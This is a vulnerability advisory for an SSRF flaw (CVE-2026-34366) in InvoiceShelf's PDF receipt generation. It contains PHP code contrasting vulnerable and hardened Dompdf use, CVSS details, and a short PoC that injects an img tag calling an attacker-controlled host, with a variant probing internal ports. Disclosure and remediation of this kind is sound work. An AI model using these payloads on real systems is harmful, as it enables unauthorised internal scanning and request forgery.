Security Vulnerability Report
CVE-2026-34366 CVSS 7.6 HIGH

Published: 2026-03-31 21:16:30
Last Modified: 2026-04-07 15:26:24

Description

InvoiceShelf is an open-source web & mobile app that helps track expenses, payments and create professional invoices and estimates. Prior to version 2.2.0, a Server-Side Request Forgery (SSRF) vulnerability exists in the Payment receipt PDF generation module. User-supplied HTML in the payment Notes field is passed unsanitised to the Dompdf rendering library, which will fetch any remote resources referenced in the markup. The vulnerability is exploitable directly via the PDF receipt endpoint, regardless of whether automated email attachments are enabled. This issue has been patched in version 2.2.0.
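The mechanism the description covers, as an added illustration that is not InvoiceShelf's code nor Dompdf's own: a receipt renderer that concatenates the Notes field into its HTML template with remote fetching enabled, beside a hardened version that escapes Notes so it renders as text and keeps remote fetching off. The template, the function names, the `public/` asset directory and the `attacker.invalid` host are assumptions for the example; the page does not say how InvoiceShelf configures Dompdf or what the 2.2.0 fix changed, only that unsanitised Notes HTML reached Dompdf and Dompdf fetched the resources it referenced.

```php
<?php
// Illustration for CVE-2026-34366 (not InvoiceShelf's code): how a Dompdf receipt
// renderer becomes an SSRF sink, and one way to harden it. Function names, the
// template and the asset directory below are assumptions for the example.
require __DIR__ . '/vendor/autoload.php'; // dompdf/dompdf 2.x assumed

use Dompdf\Dompdf;
use Dompdf\Options;

/** Assumed receipt template: $notesHtml is inserted exactly as given. */
function receiptTemplate(string $notesHtml): string
{
    return '<!DOCTYPE html><html><body>'
        . '<h1>Payment receipt</h1>'
        . '<div class="notes">' . $notesHtml . '</div>'
        . '</body></html>';
}

/**
 * Vulnerable pattern: user-controlled Notes go into the markup untouched and the
 * renderer may fetch remote resources, so <img src="http://..."> in the notes makes
 * the server issue that request every time the receipt PDF is generated.
 */
function renderReceiptVulnerable(string $notes): string
{
    $options = new Options();
    $options->set('isRemoteEnabled', true);
    $dompdf = new Dompdf($options);
    $dompdf->loadHtml(receiptTemplate($notes));
    $dompdf->render();
    return $dompdf->output();
}

/** Escape Notes so it renders as text: '<' becomes '&lt;' and no element is created. */
function escapeNotes(string $notes): string
{
    return nl2br(htmlspecialchars($notes, ENT_QUOTES | ENT_HTML5, 'UTF-8'));
}

/**
 * Hardened pattern: (1) treat Notes as text, not markup; (2) keep remote fetching
 * off so markup that slips through cannot reach the network; (3) confine local
 * file reads to the asset directory, since Dompdf also resolves local paths in src.
 */
function renderReceiptHardened(string $notes): string
{
    $options = new Options();
    $options->set('isRemoteEnabled', false);
    $options->set('chroot', __DIR__ . '/public'); // assumed asset directory
    $dompdf = new Dompdf($options);
    $dompdf->loadHtml(receiptTemplate(escapeNotes($notes)));
    $dompdf->render();
    return $dompdf->output();
}

// Demo with a constructed payload of the kind the advisory describes.
$payload = 'Thanks!<img src="http://attacker.invalid/ssrf_test.jpg" />';
echo receiptTemplate(escapeNotes($payload)), PHP_EOL;
// The notes now contain ...&lt;img src=&quot;http://attacker.invalid/...&quot; /&gt;
// so there is no <img> element for Dompdf to fetch.
```

Escaping is the fix that addresses the root cause (Notes is free text, not a markup field); turning `isRemoteEnabled` off is the defence in depth that makes any remaining injection point harmless to the network. If the application legitimately needs remote assets (a logo on the receipt, say), load those from a fixed, server-controlled URL rather than enabling remote fetching for arbitrary user-supplied markup.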

CVSS Details

CVSS Score
7.6 (GitHub advisory assessment, listed as secondary in the NVD record); the NVD primary assessment in the raw JSON below scores it 8.1
Severity
HIGH (both assessments)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N (GitHub, 7.6)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N (NVD, 8.1)
Weakness
CWE-918 (Server-Side Request Forgery)

The two assessments disagree on privileges required (High vs Low) and on scope. In practice the attacker needs an InvoiceShelf account that can create or edit a payment and request its PDF receipt; triage against the roles your deployment grants that ability to.

Configurations (Affected Products)

cpe:2.3:a:invoiceshelf:invoiceshelf:*:*:*:*:*:*:*:* - VULNERABLE
InvoiceShelf < 2.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- PoC for CVE-2026-34366 InvoiceShelf SSRF -->
<!-- Step 1: Log in to InvoiceShelf -->
<!-- Step 2: Navigate to Payments and create or edit a payment -->
<!-- Step 3: Insert the following HTML into the 'Notes' field -->
<!-- To verify SSRF, replace with your Burp Collaborator or controlled server -->
<img src="http://<attacker-controlled-domain>/ssrf_test.jpg" />
<!-- To scan internal ports (e.g., localhost port 80) -->
<!-- <img src="http://127.0.0.1:80" /> -->
<!-- Step 4: Save the payment and click to generate/download the PDF Receipt -->
<!-- Step 5: Check your server logs for incoming requests from the victim -->
```

The payload is HTML, not Python; the original page labelled it incorrectly. The external-callback variant gives a positive confirmation (a request from the InvoiceShelf host to your listener). The internal-port variant is blind: nothing from the internal response is rendered into the PDF, so a hit can only be inferred indirectly (for example from differences in generation time or error behaviour), and it should be run only against hosts you are authorised to probe.

References

https://github.com/InvoiceShelf/InvoiceShelf/releases/tag/2.2.0 (Product)
https://github.com/InvoiceShelf/InvoiceShelf/security/advisories/GHSA-38hf-fq8x-q49r (Exploit, Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-34366", "sourceIdentifier": "[email protected]", "published": "2026-03-31T21:16:29.537", "lastModified": "2026-04-07T15:26:23.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InvoiceShelf is an open-source web & mobile app that helps track expenses, payments and create professional invoices and estimates. Prior to version 2.2.0, a Server-Side Request Forgery (SSRF) vulnerability exists in the Payment receipt PDF generation module. User-supplied HTML in the payment Notes field is passed unsanitised to the Dompdf rendering library, which will fetch any remote resources referenced in the markup. The vulnerability is exploitable directly via the PDF receipt endpoint, regardless of whether automated email attachments are enabled. This issue has been patched in version 2.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:invoiceshelf:invoiceshelf:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.0", "matchCriteriaId": "DF850775-DE65-40B0-9079-B1ABA4F1F4C9"}]}]}], "references": [{"url": "https://github.com/InvoiceShelf/InvoiceShelf/releases/tag/2.2.0", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/InvoiceShelf/InvoiceShelf/security/advisories/GHSA-38hf-fq8x-q49r", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
```